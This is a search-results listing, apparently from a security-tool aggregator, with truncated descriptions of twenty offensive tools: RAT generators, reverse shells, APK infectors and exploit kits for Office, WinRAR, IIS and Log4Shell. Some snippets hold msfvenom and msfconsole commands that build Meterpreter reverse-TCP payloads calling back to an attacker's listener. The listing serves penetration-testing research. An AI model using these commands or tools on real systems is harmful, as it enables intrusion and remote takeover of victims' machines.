688 matches found
kwetza
Introducción Por Chris Le Roy @brompwnie [email protected] Kwetza es una herramienta que permite infectar una aplicación Android existente con un payload de Meterpreter. ¿Qué hace? Kwetza infecta una aplicación Android existente con plantillas de payload personalizadas o predeterminadas para...
Meterpreter_Paranoid_Mode-SSL
MeterpreterParanoidMode v1.4 - SSL/TLS connections root@kitploit: Version release: v1.4 Stable Author: pedro ubuntu r00t-3xp10it Distros Supported : Linux Kali, Mint, Ubuntu Suspicious-Shell-Activity SSA RedTeam develop @2017 Description: root@kitploit: MeterpreterParanoidMode.sh allows users to...
xc
XC Reverse shell similar a Netcat para Linux y Windows. Características Windows root@kitploit: Usage: └ Shared Commands: !exit !upload uploads a file to the target !download downloads a file from the target !lfwd local portforwarding like ssh -L !rfwd remote portforwarding like ssh -R !lsfwd list...
netrat
netrat Dependency Status Damn easy multiplatform Node.js RAT generator An easy tool to generate configurable backdoors that runs on Windows, Mac and Linux. Shells are upgradable to Meterpreter! Install root@kitploit: $ npm install -g netrat Usage root@kitploit: $ netrat It will start the building...
thorse
THorse THorse is a RAT Remote Administrator Trojan Generator for Windows/Linux systems written in Python 3. root@kitploit: This small python script can do really awesome work. Disclaimer :computer: This project was created only for good purposes and personal use. THIS SOFTWARE IS PROVIDED "AS IS"...
pentest_teamcity
Pentest TeamCity usando Metasploit TL;DR: Obtener contraseñas deJetBrains IDE como IntelliJ o PyCharm y usar esas credenciales dentro de TeamCity Continuous Integration Server para obtener una sesión de meterpreter en el servidor y agentes de compilación usando metasploit por Kacper Szurek...
Embedded-PDF
Embedded Backdoor Connection via PDF Files 😈 brought to you by Introduction This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240. As so...
msfpc
MSFvenom Payload Creator MSFPC Una forma rápida de generar varios payloads "básicos" de Meterpreter mediante msfvenom parte del framework Metasploit. Acerca de MSFvenom Payload Creator MSFPC es un envoltorio para generar múltiples tipos de payloads, basado en la elección del usuario. La idea es s...
CVE-2017-0199
Exploit toolkit CVE-2017-0199 Exploit toolkit CVE-2017-0199 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victi...
CVE-2018-20250
Setup Video demo: https://youtu.be/5tuWsi1tGS0 VirtualBox Machine: https://j2c.cc/virtualbox-machine Winrar 5.5 32bit: https://j2c.cc/winrar-550-32bit Procedure Kali: root@kitploit: ip a msfvenom -p windows/meterpreter/reversetcp lport=1234 lhost=10.0.0.199 -f exe shell.exe Windows: root@kitploit...
cve-2017-7269
fixed msf module for cve-2017-7269 fix not work when length of physical path not equal to 19,or has a host binding. add options: PhysicalPathLength,HttpHost for test: host phyiscal path: c:\inetpub\ , length=11 root@kitploit: msf use exploit/windows/iis/cve-2017-7269 msf exploitcve-2017-7269 show...
CVE-2009-3103
CVE-2009-3103 check vuln SMB nmap --script smb-vuln -p139,445 IP-TARGET set listener sudo msfconsole use exploit/multi/handler set payload windows/meterpreter/reversetcp set LHOST YOUR-KALI-IP set LPORT 80 run run exploit python3 exploit.py IP-TARGET YOUR-KALI-IP 80 windows/meterpreter/reversetcp...
l4srs
l4srs Rust implementation of the Log 4 Shell log 4 j - CVE-2021-44228 to build run cargo +nightly build This version will let you build command classes, dynamically serve a mini meterpreter that runs in a thread of the exploited Java app, and runs the LDAP and HTTP servers. This version servers...
l4s_poc
l4spoc Log4Shell Cve-2021-44228 Proof Of Concept This is a personal project that runs a simple POC that will host an LDAP server and an HTTP server for the Log4Shell exploit. Server The runservers.py will setup a stripped down meterpreter client that will call back to the Metasploit instance pass...
Vuln_Exploitation_MegaQuagga_Pentest
Vulnerability Exploitation — MegaQuagga Penetration Test Report Analyst: Samuel Weiss Organization: 0x2A Security Date: April 20, 2026 Client: MegaQuagga Publishing Target: www.megaquagga.local Classification: CONFIDENTIAL Overview This project documents a structured penetration test conducted...
CVE-2018-2628
Test for Vulnerabilities Upload Shell Method one: Method two: Execute Shell Obtain Meterpreter root@kitploit: msf use exploit/multi/script/webdelivery msf exploitmulti/script/webdelivery set target 3 target = 3 msf exploitmulti/script/webdelivery set payload windows/meterpreter/reversetcp payload...
Drupal-Exploit-Lab
Drupal-Exploit-Lab Demonstration on exploitation on Drupal 7.57 CVE-2018-7600 with and without WAFWeb Application Firewall Description The project shows how the exploitation of Drupal 7.57 looks like in two different scenarios: 1. Unprotected server → successful exploitation with Metasploit and...
freeMetsrvLoader
freeMetsrvLoader Fork of freeBokuLoader which targets and frees Metsrv's initial reflective DLL package Usage root@kitploit: meterpreter executebof freeMetsrvLoader.x64.o Can be automated with InitialAutoRunScript or AutoRunScript...
RemoteDLLInjector
Introduction This is a tools which can be used to dll injection: From the moment that RemoteDLLInjector executes will provide the full steps that performs in order to achieve DLL injection. If the DLL is successfully injected it will return back a meterpreter session with the privileges of the...
Monitor
Project Description Used for implementing privilege persistence during the post-exploitation testing phase Project Usage Step 1 : Download the project, then compile Monitor.cpp using VS. Of course, you can also use the pre-compiled one. The Monitor.cpp code is as follows: root@kitploit: include...